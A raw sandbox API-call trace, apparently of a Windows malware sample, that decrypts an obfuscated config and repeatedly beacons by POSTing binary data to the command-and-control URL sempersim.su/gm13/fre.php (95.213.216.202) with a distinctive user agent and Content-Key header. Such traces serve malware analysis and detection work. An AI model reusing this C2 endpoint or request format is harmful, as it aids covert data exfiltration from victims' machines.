CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0208.591] GetProcessHeap () returned 0x620000 [0208.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639068 [0208.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0208.592] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639068*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0208.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0208.593] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0208.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0208.594] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.594] GetProcessHeap () returned 0x620000 [0208.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639068 | out: hHeap=0x620000) returned 1 [0208.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0208.595] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643560, pdwDataLen=0x19fcfc | out: pbData=0x643560, pdwDataLen=0x19fcfc) returned 1 [0208.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0208.596] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0208.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0208.597] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0208.597] GetProcessHeap () returned 0x620000 [0208.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x6451e0 [0208.597] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0208.598] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0208.598] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0208.598] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0208.599] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0208.599] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0208.600] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0208.600] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0208.600] GetProcessHeap () returned 0x620000 [0208.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0208.600] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0208.601] GetProcessHeap () returned 0x620000 [0208.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0208.601] GetProcessHeap () returned 0x620000 [0208.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6451e0 | out: hHeap=0x620000) returned 1 [0208.602] GetProcessHeap () returned 0x620000 [0208.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643560 | out: hHeap=0x620000) returned 1 [0208.602] GetProcessHeap () returned 0x620000 [0208.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642fc0 [0208.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0208.603] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0208.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0208.647] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0208.659] GetProcessHeap () returned 0x620000 [0208.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0208.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0208.660] CryptImportKey (in: hProv=0x63ba08, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0208.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0208.661] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0208.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0208.662] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.662] GetProcessHeap () returned 0x620000 [0208.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0208.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0208.664] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642fc0, pdwDataLen=0x19fcfc | out: pbData=0x642fc0, pdwDataLen=0x19fcfc) returned 1 [0208.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0208.665] CryptDestroyKey (hKey=0x62d190) returned 1 [0208.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0208.666] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0208.666] GetProcessHeap () returned 0x620000 [0208.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ca8 [0208.670] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0208.670] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0208.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0208.671] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0208.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0208.672] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0208.672] GetProcessHeap () returned 0x620000 [0208.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633340 [0208.672] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c078*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0208.673] GetProcessHeap () returned 0x620000 [0208.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b670 [0208.673] socket (af=2, type=1, protocol=6) returned 0x378 [0208.674] connect (s=0x378, name=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0208.730] FreeAddrInfoW (pAddrInfo=0x63c078*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0208.730] GetProcessHeap () returned 0x620000 [0208.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0208.730] GetProcessHeap () returned 0x620000 [0208.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0208.731] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0208.733] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0208.733] GetProcessHeap () returned 0x620000 [0208.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0208.733] GetProcessHeap () returned 0x620000 [0208.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0208.733] GetProcessHeap () returned 0x620000 [0208.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643050 [0208.734] GetProcessHeap () returned 0x620000 [0208.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0208.735] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0208.736] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0208.736] GetProcessHeap () returned 0x620000 [0208.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0208.736] GetProcessHeap () returned 0x620000 [0208.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0208.737] send (s=0x378, buf=0x63a880*, len=237, flags=0) returned 237 [0208.738] send (s=0x378, buf=0x6421e0*, len=159, flags=0) returned 159 [0208.738] GetProcessHeap () returned 0x620000 [0208.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0208.738] recv (in: s=0x378, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0210.400] GetProcessHeap () returned 0x620000 [0210.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0210.401] GetProcessHeap () returned 0x620000 [0210.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643050 | out: hHeap=0x620000) returned 1 [0210.401] GetProcessHeap () returned 0x620000 [0210.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0210.401] GetProcessHeap () returned 0x620000 [0210.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0210.402] closesocket (s=0x378) returned 0 [0210.403] GetProcessHeap () returned 0x620000 [0210.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b670 | out: hHeap=0x620000) returned 1 [0210.403] GetProcessHeap () returned 0x620000 [0210.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ca8 | out: hHeap=0x620000) returned 1 [0210.403] GetProcessHeap () returned 0x620000 [0210.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0210.403] GetProcessHeap () returned 0x620000 [0210.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633340 | out: hHeap=0x620000) returned 1 [0210.414] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x39c) returned 0x378 [0210.418] Sleep (dwMilliseconds=0xea60) [0210.437] GetProcessHeap () returned 0x620000 [0210.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6430e0 [0210.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0210.438] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0210.446] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0210.455] GetProcessHeap () returned 0x620000 [0210.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0210.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0210.457] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d210) returned 1 [0210.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0210.458] CryptSetKeyParam (hKey=0x62d210, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0210.458] CryptSetKeyParam (hKey=0x62d210, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.458] GetProcessHeap () returned 0x620000 [0210.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0210.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0210.460] CryptDecrypt (in: hKey=0x62d210, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6430e0, pdwDataLen=0x19fcfc | out: pbData=0x6430e0, pdwDataLen=0x19fcfc) returned 1 [0210.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0210.465] CryptDestroyKey (hKey=0x62d210) returned 1 [0210.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0210.466] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0210.466] GetProcessHeap () returned 0x620000 [0210.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646548 [0210.467] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0210.467] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0210.468] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0210.468] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0210.468] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0210.469] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0210.469] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0210.469] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0210.469] GetProcessHeap () returned 0x620000 [0210.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0210.469] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0210.470] GetProcessHeap () returned 0x620000 [0210.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0210.470] GetProcessHeap () returned 0x620000 [0210.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646548 | out: hHeap=0x620000) returned 1 [0210.471] GetProcessHeap () returned 0x620000 [0210.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6430e0 | out: hHeap=0x620000) returned 1 [0210.471] GetProcessHeap () returned 0x620000 [0210.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643050 [0210.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0210.472] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0210.477] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0210.485] GetProcessHeap () returned 0x620000 [0210.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0210.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0210.486] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0210.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0210.486] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0210.487] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.487] GetProcessHeap () returned 0x620000 [0210.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0210.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0210.488] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643050, pdwDataLen=0x19fcfc | out: pbData=0x643050, pdwDataLen=0x19fcfc) returned 1 [0210.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0210.489] CryptDestroyKey (hKey=0x62d710) returned 1 [0210.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0210.490] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0210.490] GetProcessHeap () returned 0x620000 [0210.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645a80 [0210.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0210.491] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0210.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0210.492] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0210.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0210.492] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0210.492] GetProcessHeap () returned 0x620000 [0210.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0210.493] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0210.494] GetProcessHeap () returned 0x620000 [0210.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5d0 [0210.494] socket (af=2, type=1, protocol=6) returned 0x37c [0210.496] connect (s=0x37c, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0210.550] FreeAddrInfoW (pAddrInfo=0x63c348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0210.550] GetProcessHeap () returned 0x620000 [0210.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0210.550] GetProcessHeap () returned 0x620000 [0210.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0210.551] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0210.552] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0210.552] GetProcessHeap () returned 0x620000 [0210.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0210.552] GetProcessHeap () returned 0x620000 [0210.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0210.552] GetProcessHeap () returned 0x620000 [0210.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643488 [0210.553] GetProcessHeap () returned 0x620000 [0210.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0210.553] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0210.554] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0210.554] GetProcessHeap () returned 0x620000 [0210.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0210.554] GetProcessHeap () returned 0x620000 [0210.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0210.555] send (s=0x37c, buf=0x63a880*, len=237, flags=0) returned 237 [0210.555] send (s=0x37c, buf=0x6421e0*, len=159, flags=0) returned 159 [0210.556] GetProcessHeap () returned 0x620000 [0210.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0210.556] recv (in: s=0x37c, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0212.649] GetProcessHeap () returned 0x620000 [0212.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0212.650] GetProcessHeap () returned 0x620000 [0212.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0212.650] GetProcessHeap () returned 0x620000 [0212.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0212.650] GetProcessHeap () returned 0x620000 [0212.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0212.650] closesocket (s=0x37c) returned 0 [0212.651] GetProcessHeap () returned 0x620000 [0212.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5d0 | out: hHeap=0x620000) returned 1 [0212.651] GetProcessHeap () returned 0x620000 [0212.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645a80 | out: hHeap=0x620000) returned 1 [0212.652] GetProcessHeap () returned 0x620000 [0212.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643050 | out: hHeap=0x620000) returned 1 [0212.652] GetProcessHeap () returned 0x620000 [0212.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0212.653] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x548) returned 0x37c [0212.654] Sleep (dwMilliseconds=0xea60) [0212.667] GetProcessHeap () returned 0x620000 [0212.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643560 [0212.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0212.670] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0212.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0212.677] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0212.691] GetProcessHeap () returned 0x620000 [0212.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0212.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0212.695] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0212.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0212.697] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0212.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0212.706] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.706] GetProcessHeap () returned 0x620000 [0212.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0212.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0212.710] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643560, pdwDataLen=0x19fcfc | out: pbData=0x643560, pdwDataLen=0x19fcfc) returned 1 [0212.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0212.712] CryptDestroyKey (hKey=0x62d710) returned 1 [0212.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0212.715] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0212.720] GetProcessHeap () returned 0x620000 [0212.720] RtlAllocateHeap 